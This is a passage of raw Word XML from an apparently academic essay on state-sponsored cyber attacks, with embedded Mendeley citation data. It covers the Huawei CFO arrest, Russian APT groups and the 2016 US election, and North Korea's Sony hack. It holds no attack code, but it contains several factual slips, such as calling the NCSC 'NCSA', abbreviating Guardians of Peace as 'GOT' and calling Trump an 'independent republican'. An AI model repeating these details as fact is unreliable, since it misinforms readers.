      <w:r w:rsidR="00CF1AEC" w:rsidRPr="00CF1AEC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[25], [26]</w:t>
      </w:r>
      <w:r w:rsidR="00C13921">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00C13921">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00CF1AEC">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1007/s11277-018-5618-4","ISSN":"1572834X","abstract":"The concept of “Smart Cities” is very important as it aims to uplift the living standards of the residents by greatly improving the City’s Infrastructure, Traffic management, Governance, Water and Waste management, Power management, Health systems, Safety and Security systems, Education systems etc. This paper describes the concept of Smart Cities and enumerates its various benefits. It describes various Services and Applications required to make a City Smart and the role of ICT technologies in their implementation. Further, the challenges in the current ICT systems are discussed in their role to Smart City implementation. The paper discusses the proposed features of 5G technologies and describes how 5G could be the best answer for successful, implementation of Smart Cities. It lists down a few Smart City Use Cases which are enabled by 5G. 5G will act as the backbone of IoT and pave the way for the development of Smart Cities. © 2018, Springer Science+Business Media, LLC, part of Springer Nature.","author":[{"dropping-particle":"","family":"Rao","given":"Sriganesh K.","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Prasad","given":"Ramjee","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Wireless Personal Communications","id":"ITEM-1","issued":{"date-parts":[["2018"]]},"title":"Impact of 5G Technologies on Smart City Implementation","type":"article-journal"},"uris":["http://www.mendeley.com/documents/?uuid=a7910e5d-d362-4758-bcb2-b8a04cbd3245"]}],"mendeley":{"formattedCitation":"[27]","plainTextFormattedCitation":"[27]","previouslyFormattedCitation":"[27]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00C13921">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00CF1AEC" w:rsidRPr="00CF1AEC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[27]</w:t>
      </w:r>
      <w:r w:rsidR="00C13921">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E20E49" w14:textId="78BC7E19" w:rsidR="00AE0170" w:rsidRDefault="00346F21" w:rsidP="00553C6F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">On </w:t>
      </w:r>
      <w:r w:rsidR="00C13921">
        <w:t>the 1</w:t>
      </w:r>
      <w:r w:rsidR="00FA2384" w:rsidRPr="00FA2384">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>st</w:t>
      </w:r>
      <w:r w:rsidR="00FA2384">
        <w:t xml:space="preserve"> of December 2018</w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="008F30C7">
        <w:t xml:space="preserve"> the Canadian government arrested the C</w:t>
      </w:r>
      <w:r w:rsidR="008F30C7" w:rsidRPr="008F30C7">
        <w:t xml:space="preserve">hief </w:t>
      </w:r>
      <w:r w:rsidR="008F30C7">
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidR="008F30C7" w:rsidRPr="008F30C7">
        <w:t xml:space="preserve">inancial </w:t>
      </w:r>
      <w:r w:rsidR="008F30C7">
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidR="008F30C7" w:rsidRPr="008F30C7">
        <w:t>fficer</w:t>
      </w:r>
      <w:r w:rsidR="008F30C7">
        <w:t xml:space="preserve"> (CFO) of Huawei </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00346F21">
        <w:t>Meng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00346F21">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00346F21">
        <w:t>Wanzhou</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008F30C7">
        <w:t xml:space="preserve">who is the daughter of the founder and Chief Executive Officer </w:t>
      </w:r>
      <w:r w:rsidRPr="00346F21">
        <w:t xml:space="preserve">Ren </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00346F21">
        <w:t>Zhengfei</w:t>
      </w:r>
      <w:r w:rsidR="008F30C7">
        <w:t>on</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008F30C7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">on </w:t>
      </w:r>
      <w:r w:rsidR="008F30C7">
        <w:t>behalf of the US government for alleged cyber-espionage</w:t>
      </w:r>
      <w:r w:rsidR="00391253">
        <w:t xml:space="preserve"> and cyber-theft</w:t>
      </w:r>
      <w:r w:rsidR="008F30C7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>by Huawei and also for violating US trade sanctions against Iran.</w:t>
      </w:r>
      <w:r w:rsidR="00C13921">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C13921">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00CF1AEC">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"abstract":"The Chinese telecom company Huawei is at the centre of an increasingly tense standoff between China and the US. What began as a trade spat and grievances over corporate intellectual property theft has developed into a global standoff involving “hostage diplomacy”, death sentences and allegations of Chinese espionage. Huawei’s senior executive Meng Wanzhou, was arrested in Canada in December over allegations of sanctions violations and awaits extradition to the US. Meanwhile, three Canadians remain in police custody in China; one of them was sentenced to death this month. Washington, meanwhile, has said it will file a formal extradition request for Meng by the 30 January deadline.","author":[{"dropping-particle":"","family":"Rushe, Dominic; Kuo","given":"Lily","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"The Guardian","id":"ITEM-1","issued":{"date-parts":[["2019"]]},"title":"Huawei's problems deepen as western suspicions mount","type":"webpage"},"uris":["http://www.mendeley.com/documents/?uuid=38e5373d-0b08-4bde-b90e-4cec3ea9d0a4"]}],"mendeley":{"formattedCitation":"[28]","plainTextFormattedCitation":"[28]","previouslyFormattedCitation":"[28]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00C13921">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00CF1AEC" w:rsidRPr="00CF1AEC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[28]</w:t>
      </w:r>
      <w:r w:rsidR="00C13921">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="02411866" w14:textId="67699A76" w:rsidR="00553C6F" w:rsidRDefault="00553C6F" w:rsidP="00553C6F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E135C1F" w14:textId="548875DA" w:rsidR="00C13921" w:rsidRDefault="00553C6F" w:rsidP="00553C6F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">It has </w:t>
      </w:r>
      <w:r w:rsidR="00AE0170">
        <w:t xml:space="preserve">also </w:t>
      </w:r>
      <w:r>
        <w:t>been reported by western security services that Russia have a state</w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>sponsored elite APT group within their FSB security services (that translates in English as the Federal Security Services (FSS)) that are actively hacking western country’s national infrastructures and institutions.</w:t>
      </w:r>
      <w:r w:rsidR="00C13921">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009259DA">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00CF1AEC">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"abstract":"The U.S. Department of the Treasury's Office of Foreign Assets Control announced June 11 the sanctions against companies and individuals for allegedly providing technical and material support to, or being owned or controlled by, entities working for the Russian foreign intelligence agency, the Federal Security Service, or FSB. Recent \"malign and destabilizing cyber activities\" connected to Russia, according to the Treasury Dept., include the NotPetya ransomware attacks against European and North American companies in June 2017, cyber intrusions against the U.S. power grid aimed at launching future attacks, and compromises of network infrastructure devices, including routers and switches, that could lead to disruptive cyberattacks. The Federal Bureau of Investigation and U.S. Department of Homeland Security blamed the Kremlin in a March 15 joint alert for a two-year-old hacking campaign to infiltrate and spy on the computer networks of U.S. government entities and critical infrastructure, including the power grid and the business and administrative networks of analog-controlled nuclear power plants.","author":[{"dropping-particle":"","family":"Smith","given":"Andrew Coffman","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"SNL Energy Power Daily","id":"ITEM-1","issued":{"date-parts":[["2018"]]},"title":"New US sanctions for Russian cyberattacks snare 2 Calif. tech firms","type":"article-journal"},"uris":["http://www.mendeley.com/documents/?uuid=2403f416-e9eb-4732-aa7d-7c2b2dacebe0"]}],"mendeley":{"formattedCitation":"[29]","plainTextFormattedCitation":"[29]","previouslyFormattedCitation":"[29]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="009259DA">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00CF1AEC" w:rsidRPr="00CF1AEC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[29]</w:t>
      </w:r>
      <w:r w:rsidR="009259DA">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B8F4E7" w14:textId="77777777" w:rsidR="00C13921" w:rsidRDefault="00C13921" w:rsidP="00553C6F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="551AB304" w14:textId="5224A99A" w:rsidR="00553C6F" w:rsidRDefault="00553C6F" w:rsidP="00553C6F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The Russian sponsored elite hacking teams are reported to have the online aliases, ‘Shadow Brokers’ and ‘Fancy Bears’ among others to hide their identity</w:t>
      </w:r>
      <w:r w:rsidR="006B78FF">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A high profile example of the  </w:t>
      </w:r>
      <w:r w:rsidR="00E12438">
        <w:t>Russian APT teams</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E12438">
        <w:t>that w</w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t>ere</w:t>
      </w:r>
      <w:r w:rsidR="00E12438">
        <w:t xml:space="preserve"> reported within the mainstream western media was that of</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the tampering of the 2016 US elections and hacking of the </w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t>D</w:t>
      </w:r>
      <w:r>
        <w:t>emocratic candidate for president; Hilary Clinton’s official government E-Mails that were subsequently leaked to help the independent republican candidate Donald Trump win the 2016 US election to become president</w:t>
      </w:r>
      <w:r w:rsidR="00E12438">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as it was thought that he was the preferred Russian candidate within Moscow because of the global views he help during his campaign</w:t>
      </w:r>
      <w:r w:rsidR="00E12438">
        <w:t xml:space="preserve"> for president</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="009259DA">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00CF1AEC">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1080/01402390.2018.1559152","ISSN":"1743937X","abstract":"How states employ coercion to achieve a position of advantage relative to their rivals is changing. Cyber operations have become a modern manifestation of political warfare. This paper provides a portrait of how a leading cyber actor, Russia, uses the digital domain to disrupt, spy, and degrade. The case illustrates the changing character of power and coercion in the twenty-first century. As a contribution to this special issue on twenty-first century military strategy, the findings suggest new forms of competition short of war.","author":[{"dropping-particle":"","family":"Jensen","given":"Benjamin","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Valeriano","given":"Brandon","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Maness","given":"Ryan","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Journal of Strategic Studies","id":"ITEM-1","issued":{"date-parts":[["2019"]]},"title":"Fancy bears and digital trolls: Cyber strategy with a Russian twist","type":"article-journal"},"uris":["http://www.mendeley.com/documents/?uuid=9a3b5c8e-a1bc-4185-9eea-7271c70ec187"]}],"mendeley":{"formattedCitation":"[30]","plainTextFormattedCitation":"[30]","previouslyFormattedCitation":"[30]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="009259DA">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00CF1AEC" w:rsidRPr="00CF1AEC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[30]</w:t>
      </w:r>
      <w:r w:rsidR="009259DA">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="009259DA">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00CF1AEC">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"abstract":"n an April afternoon earlier this year, Russian president Vladimir Putin headlined a gathering of some four hundred journalists, bloggers, and media executives in St. Petersburg. Dressed in a sleek navy suit, Putin looked relaxed, even comfortable, as he took questions. About an hour into the forum, a young blogger in a navy zip sweater took the microphone and asked Putin what he thought of the \"so-called Panama Papers.\" The blogger was referring to a cache of more than eleven million computer files that had been stolen from Mossack Fonseca, a Panamanian law firm. The leak was the largest in history, involving 2.6 terabytes of data, enough to fill more than five hundred DVDs. On April 3, four days before the St. Petersburg forum, a group of international news outlets published the first in a series of stories based on the leak, which had taken them more than a year to investigate. The series revealed corruption on a massive scale: Mossack Fonseca's legal maneuverings had been used to hide billions of dollars. A central theme of the group's reporting was the matryoshka doll of secret shell companies and proxies, worth a reported $2 billion, that belonged to Putin's inner circle and were presumed to shelter some of the Russian president's vast personal wealth. Advertisement - Continue Reading Below image Vladimir Putin in St. Petersburg at a media forum in April 2016 Getty Images When Putin heard the blogger's question, his face lit up with a familiar smirk. He nodded slowly and confidently before reciting a litany of humiliations that the United States had inflicted on Russia. Putin reminded his audience about the sidelining of Russia during the 1998 war in Kosovo and what he saw as American meddling in Ukraine more recently. Returning to the Panama Papers, Putin cited WikiLeaks to insist that \"officials and state agencies in the United States are behind all this.\" The Americans' aim, he said, was to weaken Russia from within: \"to spread distrust for the ruling authorities and the bodies of power within society.\" Though a narrow interpretation of Putin's accusation was defensible—as WikiLeaks had pointed out, one of the members of the Panama Papers consortium had received financial support from USAID, a federal agency—his swaggering assurance about America's activities has a more plausible explanation: Putin's own government had been preparing a vast, covert, and unprecedented campaign of political sabotage against the United States and its allies for mo…","author":[{"dropping-particle":"","family":"Rid","given":"Thomas","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Esquire Magazine","id":"ITEM-1","issued":{"date-parts":[["2016"]]},"title":"How Russia Pulled Off the Biggest Election Hack in U.S. History","type":"article-newspaper"},"uris":["http://www.mendeley.com/documents/?uuid=f2cd0ea6-3ca0-4ce4-801b-c50ca3bf0313"]}],"mendeley":{"formattedCitation":"[31]","plainTextFormattedCitation":"[31]","previouslyFormattedCitation":"[31]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="009259DA">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00CF1AEC" w:rsidRPr="00CF1AEC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[31]</w:t>
      </w:r>
      <w:r w:rsidR="009259DA">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EE6D2F" w14:textId="77777777" w:rsidR="009259DA" w:rsidRDefault="009259DA" w:rsidP="00553C6F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D490B81" w14:textId="073B64AB" w:rsidR="00553C6F" w:rsidRDefault="006B78FF" w:rsidP="00553C6F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>North Korea also ha</w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> an APT group within its security services that has the known hacking aliases; ‘Bureau-121 and ‘Guardian of Peace’</w:t>
      </w:r>
      <w:r w:rsidR="0046380B">
        <w:t xml:space="preserve"> (GOT)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00B768DD">
        <w:t>Bureau-121</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B768DD">
        <w:t>was allegedly</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> responsible for the previously discussed ‘WannaCry’ attack and</w:t>
      </w:r>
      <w:r w:rsidR="00B768DD">
        <w:t xml:space="preserve"> GOT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the infamous </w:t>
      </w:r>
      <w:r w:rsidR="009E57C7">
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:t>Sony</w:t>
      </w:r>
      <w:r w:rsidR="009E57C7">
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hack that took place on the 24</w:t>
      </w:r>
      <w:r w:rsidRPr="006B78FF">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> November 2014,</w:t>
      </w:r>
      <w:r w:rsidR="009E57C7">
        <w:t xml:space="preserve"> that</w:t>
      </w:r>
      <w:r w:rsidR="0046380B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006959A4">
        <w:t>the group</w:t>
      </w:r>
      <w:r w:rsidR="0046380B">
        <w:t xml:space="preserve"> claimed to </w:t>
      </w:r>
      <w:r w:rsidR="006959A4">
        <w:t>have stolen</w:t>
      </w:r>
      <w:r w:rsidR="0046380B">
        <w:t xml:space="preserve"> 100 Terabytes </w:t>
      </w:r>
      <w:r w:rsidR="00B96EC4">
        <w:t>of data</w:t>
      </w:r>
      <w:r w:rsidR="0046380B">
        <w:t xml:space="preserve"> over a two month period</w:t>
      </w:r>
      <w:r w:rsidR="009E57C7">
        <w:t xml:space="preserve"> that included employees E-Mails</w:t>
      </w:r>
      <w:r w:rsidR="0046380B">
        <w:t>, movies, games and confidential internal company memo</w:t>
      </w:r>
      <w:r w:rsidR="00B768DD">
        <w:t>s using a</w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="00B768DD">
        <w:t xml:space="preserve"> SMB worm tool</w:t>
      </w:r>
      <w:r w:rsidR="00B96EC4">
        <w:t xml:space="preserve"> that was suspected to have entered the internal Sony networks via a malicious phishing E-Mail link that was </w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00B96EC4">
        <w:t>ent to employees of the company</w:t>
      </w:r>
      <w:r w:rsidR="00B768DD">
        <w:t>. This</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hack was </w:t>
      </w:r>
      <w:r w:rsidR="0046380B">
        <w:t>said to be a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> retaliation to </w:t>
      </w:r>
      <w:r w:rsidR="0046380B">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Sony pictures </w:t>
      </w:r>
      <w:r w:rsidR="006959A4">
        <w:t xml:space="preserve">fictitious </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">movie </w:t>
      </w:r>
      <w:r w:rsidR="00B768DD">
        <w:t xml:space="preserve">called; </w:t>
      </w:r>
      <w:r w:rsidR="006959A4">
        <w:t>‘The Interview’ that was about the Central Intelligence Agency (CIA) assassination of the North Korean dictator</w:t>
      </w:r>
      <w:r w:rsidR="00B768DD">
        <w:t xml:space="preserve"> Kim Jung-un</w:t>
      </w:r>
      <w:r w:rsidR="006959A4">
        <w:t xml:space="preserve">. This hack </w:t>
      </w:r>
      <w:r w:rsidR="009E57C7">
        <w:t>cost Sony $15 Million</w:t>
      </w:r>
      <w:r w:rsidR="006959A4">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="001F5148">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00CF1AEC">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"ISSN":"15220966","abstract":"The North Korean cyber attack against Sony Pictures Entertainment in connection with the planned release of The Interview raised important questions about the feasibility of deterrence in cyberspace, the protection of First Amendment values, and the responsibility of the US government to safeguard private networks. It also resulted in the unprecedented attribution of responsibility for a cyber attack to a nation state by a US president, despite public controversy over the evidence. North Korea has long engaged in provocative behavior on the Korean peninsula, recently including cyber attacks, but the probability of general war with South Korea remains quite low. Strategists describe this problem as the stability-instability paradox. North Korean coercion targeting a corporation on US soil in effect extends this dynamic into global cyberspace. It is impossible to deter all forms of cyber harassment, but policymakers can manipulate the threshold of ambiguity that makes limited aggression more or less attractive. [ABSTRACT FROM AUTHOR]","author":[{"dropping-particle":"","family":"Haggard","given":"Stephan","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Lindsay","given":"Jon R.","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Asia Pacific Issues","id":"ITEM-1","issued":{"date-parts":[["2015"]]},"title":"North Korea and the Sony hack: Exporting instability through cyberspace","type":"article-journal"},"uris":["http://www.mendeley.com/documents/?uuid=c49b9c7c-836c-4455-9f91-c732ebe83981"]},{"id":"ITEM-2","itemData":{"ISSN":"00158259","abstract":"The article presents the story behind the cyberattack on Sony Pictures Entertainment on November 24, 2014. It describes the events leading to the cyberattack, the release of stolen confidential files onto public file-sharing sites and Sony employees' fears of identity theft. It discusses allegations on the role of North Korea which had issued threats against the film \"The Interview\" due for release that Christmas, financial losses and litigations facing Sony.","author":[{"dropping-particle":"","family":"Elkind","given":"Peter","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Fortune","id":"ITEM-2","issued":{"date-parts":[["2015"]]},"title":"Inside the hack of the century","type":"article-journal"},"uris":["http://www.mendeley.com/documents/?uuid=26ddbc78-079f-4fda-9e17-43127a5f9a7b"]}],"mendeley":{"formattedCitation":"[32], [33]","plainTextFormattedCitation":"[32], [33]","previouslyFormattedCitation":"[32], [33]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="001F5148">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00CF1AEC" w:rsidRPr="00CF1AEC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[32], [33]</w:t>
      </w:r>
      <w:r w:rsidR="001F5148">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C3E403" w14:textId="1D0F226E" w:rsidR="00DC3448" w:rsidRDefault="00DC3448" w:rsidP="00553C6F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E3917A7" w14:textId="50A116D1" w:rsidR="00553C6F" w:rsidRDefault="00DC3448" w:rsidP="00553C6F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Western governments </w:t>
      </w:r>
      <w:r w:rsidR="00821BD4">
        <w:t xml:space="preserve">have specialised agencies </w:t>
      </w:r>
      <w:r>
        <w:t>such as</w:t>
      </w:r>
      <w:r w:rsidR="00821BD4">
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the US’s NSA and the UK’s </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC3448">
        <w:t xml:space="preserve">Government Communications Headquarters </w:t>
      </w:r>
      <w:r>
        <w:t>(GCHQ) and the National Cyber Security Agency (NCSA) to combat the ongoing state</w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>sponsored hacks and other national cybersecurity threats.</w:t>
      </w:r>
      <w:r w:rsidR="001F5148">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001F5148">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00CF1AEC">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"abstract":"• NSA and GCHQ unlock encryption used to protect emails, banking and medical records • $250m-a-year US program works covertly with tech companies to insert weaknesses into products • Security experts say programs 'undermine the fabric of the internet'","author":[{"dropping-particle":"","family":"Ball","given":"James","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Borger","given":"J","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Greenwald","given":"G","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"The Guardian","id":"ITEM-1","issued":{"date-parts":[["2013"]]},"title":"Revealed: how US and UK spy agencies defeat internet privacy and security","type":"article-journal"},"uris":["http://www.mendeley.com/documents/?uuid=47929589-bbfe-4341-a010-01cd091d5f74"]},{"id":"ITEM-2","itemData":{"ISSN":"0261-3077","abstract":"Exclusive: British spy agency collects and stores vast quantities of global email messages, Facebook posts, internet histories and calls, and shares them with NSA, latest documents from Edward Snowden reveal","author":[{"dropping-particle":"","family":"MacAskill","given":"Ewen","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Borger","given":"Julian","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Hopkins","given":"Nick","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Davies","given":"Nick","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Ball","given":"James","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"The Guardian","id":"ITEM-2","issued":{"date-parts":[["2013"]]},"title":"GCHQ taps fibre-optic cables for secret access to world's communications","type":"article-journal"},"uris":["http://www.mendeley.com/documents/?uuid=ed80c0df-28e8-4d67-be0c-51f415eb71fc"]}],"mendeley":{"formattedCitation":"[34], [35]","plainTextFormattedCitation":"[34], [35]","previouslyFormattedCitation":"[34], [35]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="001F5148">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00CF1AEC" w:rsidRPr="00CF1AEC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[34], [35]</w:t>
      </w:r>
      <w:r w:rsidR="001F5148">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00CF1AEC">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00BB5B08">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"abstract":"The future of the UK’s security and prosperity rests on digital foundations. The challenge of our generation is to build a flourishing digital society that is both resilient to cyber threats, and equipped with the knowledge and capabilities required to maximise opportunities and manage risks.","author":[{"dropping-particle":"","family":"NCSC","given":"","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"National Cyber Security Strategy","id":"ITEM-1","issued":{"date-parts":[["2016"]]},"title":"National Cyber Security Strategy 2016-2021","type":"article-journal"},"uris":["http://www.mendeley.com/documents/?uuid=31e4ec3f-d205-48c1-8e7e-74646bbd36f7"]}],"mendeley":{"formattedCitation":"[36]","plainTextFormattedCitation":"[36]","previouslyFormattedCitation":"[36]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00CF1AEC">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00CF1AEC" w:rsidRPr="00CF1AEC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[36]</w:t>
      </w:r>
      <w:r w:rsidR="00CF1AEC">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF52CE9" w14:textId="77777777" w:rsidR="005E7FCE" w:rsidRDefault="005E7FCE" w:rsidP="00553C6F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
